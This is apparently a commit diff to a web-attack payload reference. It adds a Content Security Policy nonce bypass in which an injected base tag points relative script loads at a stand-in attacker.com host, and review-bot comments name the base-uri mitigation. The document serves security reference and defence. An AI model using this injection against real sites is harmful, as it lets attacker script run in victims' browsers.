Bypass CSP, technique from #715

Swissky
2024-11-02 12:26:45 +01:00
parent d0c4454ef2
commit 9866fef5b4
2 changed files with 32 additions and 10 deletions


@@ -83,6 +83,8 @@
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
- [Bypass CSP script-src self](#bypass-csp-script-src-self)
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
- [Bypass CSP nonce](#bypass-csp-nonce)
- [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
- [References](#references)
## Vulnerability Details
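Review bot: the two new TOC anchors `#bypass-csp-nonce` and `#bypass-csp-header-sent-by-php` match the `### Bypass CSP nonce` and `### Bypass CSP header sent by PHP` headings in the second hunk, so the links will resolve; the only thing to keep in mind is that the TOC order must stay in sync with the section order if more bypass subsections are added later.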
@@ -1308,6 +1310,26 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
```
### Bypass CSP nonce
**Requirements**:
* CSP like `script-src 'nonce-RANDOM_NONCE'`
* Imported JS file with a relative link: `<script src='/PATH.js'></script>`
**Payload**:
1. Inject a base tag.
```html
<base href=http://www.attacker.com>
```
2. Host your custom js file at the same path that one of the website's script.
```
http://www.attacker.com/PATH.js
```
### Bypass CSP header sent by PHP
**Requirements**:
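Review bot: the **Requirements** list of the new "Bypass CSP nonce" section omits the two conditions that decide whether this works, and that a defender would check for first: the policy must not set `base-uri` (a `base-uri 'self'` or `base-uri 'none'` directive blocks the injected `<base>` tag outright), and the injection point must be parsed before the relative `<script src='/PATH.js'>` tag, because `<base>` only affects URLs resolved after it in the document. Adding both as bullets, plus a one-line explanation that the relative `src` now resolves against the attacker's origin while the existing `nonce` attribute on the tag still authorises the load, would make the section self-explanatory and point readers at the `base-uri` mitigation. Smaller points: quote the attribute value (`<base href="http://www.attacker.com">`), fix "at the same path that one of the website's script" to "at the same path as one of the website's scripts", tag the second fence (```html or ```text) like the other fences in the file, and add a `Source:` line crediting #715, as the neighbouring sections (e.g. `Source: [@404death]...`) do.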